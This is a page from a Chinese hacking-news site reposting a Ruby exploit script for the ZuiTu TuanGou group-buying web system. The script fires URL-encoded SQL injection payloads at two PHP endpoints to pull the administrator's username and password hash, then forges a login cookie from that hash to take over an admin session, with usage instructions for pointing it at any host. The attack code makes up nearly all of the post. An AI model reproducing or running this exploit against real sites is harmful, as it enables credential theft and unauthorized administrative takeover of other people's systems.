记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

ZuiTu TuanGou System Inejction Exploit

2013-03-24 01:25
这次获取hash用的不是盲注


 


require "net/http"
require "uri"
require 'digest/md5'

doc =<<HERE
-------------------------------------------------------
ZuiTu TuanGou System Inejction Exploit
Author:ztz www.hackdig.com
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------

HERE

usage =<<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} demo.zuitu.com 80 /
HERE

def send(url, cookie='')

uri = URI(url)

http = Net::HTTP.new(uri.host, uri.port)

request = Net::HTTP::Get.new(uri.request_uri)
if cookie.length != 0
request.initialize_http_header({"Cookie" => "#{$cookie}"})
end

response = http.request(request)

return response.body

end

def encode64(bin)
[bin].pack("m")
end

def getpassword

exp1 = "http://#{$host}:#{$port}/#{$path}ajax/chargecard.php?action=query&secret=')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C4%2C5%2C9999647600%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1;%23"
exp2 = "http://#{$host}:#{$port}/#{$path}api/call.php?action=query&num=1')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1%3B%23"

$password = send(exp1).scan(/\w{32}/)

if $password.length == 0

$password = send(exp2).scan(/\w{32}/)

end

end

def getsession

cname = Digest::MD5.hexdigest($host)[0, 4] + "_ru"
cvalue = "1@" + $password.join()

$cookie = cname + "=" + encode64(cvalue)

puts "[*]cookie: #{$cookie}"

uri = URI("http://#{$host}:#{$port}/#{$path}index.php")

http = Net::HTTP.new(uri.host, uri.port)

request = Net::HTTP::Get.new(uri.request_uri)
request.initialize_http_header({"Cookie" => "#{$cookie}"})

response = http.request(request)

$session = response["Set-Cookie"].scan(/PHPSESSID=\w+;/).join()

end

puts doc
if ARGV.length < 3

puts usage

else

$host = ARGV[0]
$port = ARGV[1]
$path = ARGV[2]

puts "[*]get administrator's hash..."

getpassword()

if $password.length == 0
puts "[-]Can't get administrator's hash..."
exit
end

puts "[+]hash: #{$password.join()}"

puts "[*]Inject into cookie..."

getsession()

if $session.length == 0
puts "[-]can't get cookie!"
end

puts "[+]set this cookie: #{$session}"

end
知识来源: www.2cto.com/Article/201303/197461.html

阅读:85122 | 评论:0 | 标签:exp

想收藏或者和大家分享这篇好文章→复制链接地址

“ZuiTu TuanGou System Inejction Exploit”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云